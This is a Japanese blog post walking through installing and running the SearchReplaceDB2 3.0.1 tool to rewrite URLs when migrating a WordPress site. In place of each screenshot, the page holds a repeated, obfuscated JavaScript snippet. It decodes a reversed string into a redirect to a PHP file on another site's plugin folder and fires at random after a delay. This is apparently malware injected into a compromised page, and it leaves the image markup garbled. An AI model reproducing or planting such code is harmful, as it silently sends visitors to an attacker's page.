Sumirexxx

今日もiPhone片手に出かけます

wordpress移行の置換ツール「SearchReplaceDB2」最新バージョンの実行方法

WordPress

SearchReplaceDB$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”597″ height=”238″>

自分のブログをローカルからサーバーに移行したり、サーバーからローカルにバックアップを取ったりするのは、ブロガーにとって要となる需要な作業です。

一歩間違えば全部データが消えてしまうこともあるので、慎重になるあまり怖くて触れない!という方もいるかもしれません。

そんな時便利なのがSearchReplaceDB2

移行した側の情報を書き換えてくれる、無料なのに使い方を間違えなければとても便利なツールです。

現在SearchReplaceDB2の最新バージョンは、3.0.1となっています。

今までは旧バージョンの2.0.1を使っていましたがエラーが出たため断念。最新の3.0.1を使ってみると、やり方が以前と変わっていました。

フォルダごとアップロードする

まずは旧バージョンと同じく自分のメールに届いたダウンロードリンクから、必要なzipファイルを取得します。

メール送信

チェックをつけないと送信ボタンが表示されないので注意!

メール送信$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”599″ height=”504″>

届いたメールのリンク

「here」の部分をクリックしてファイルを取得します。

searchreplacedb2$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”597″ height=”246″>

ダウンロード

ダウンロードリンクから、zipファイルを自分のフォルダにダウンロードして解凍します。

ダウンロード$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”599″ height=”510″>

解凍後にできたフォルダの中には、以前のように「searchreplacedb2.php」というphpファイルが見当たりません。

でも大丈夫!解凍後にできたフォルダを丸ごとサーバーにおいてしまいましょう。アップロードする場所は、「wp-content」や「wp-config.php」と同じ階層にします。

フォルダアップロード$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”516″ height=”495″>

ブラウザから実行する

フォルダを丸ごとアップロードできたら、ブラウザから開きます。

アドレスは「http://ドメイン名/Search-Replace-DB-master/」です。旧バージョンではphpファイルをそのまま入力して「http://ドメイン名/searchreplacedb2.php」としていましたが、今回はフォルダなのでこのようになります。

旧バージョン

旧バージョン$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”599″ height=”431″>

現在のバージョン

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de47d53.png” alt=”情報入力” title=”情報入力.png” border=”0″ width=”599″ height=”277″>

旧バージョンと現在のバージョンを比較すると、やっぱり新しい方が使いやすくなっているように感じます。

あとは自分が置換したい情報を入力するだけ。

たとえばこのブログなら、「replace」が「http://ローカルドメイン/フォルダ名」で「with」が「http://sumirexxx.com」となります。

置換情報を間違えると大変なので、ここだけは最新の注意が必要です。

実行は「dry run」か「live run」を選びます。置換するファイルを確認しながら実行するなら「live run」です。

まとめ

この方法を見つけてから、サーバ移行がとてもラクになりました。以前はsqlファイルを置換していたのですが、記事が多くなってくると莫大な時間がかかってしまっていたので…。

SearchReplaceDB2を使うと、所要時間も難しいこともありません。

無料でここまで使えるファイルを提供してくれて、ありがたいです!

この記事をシェアする

<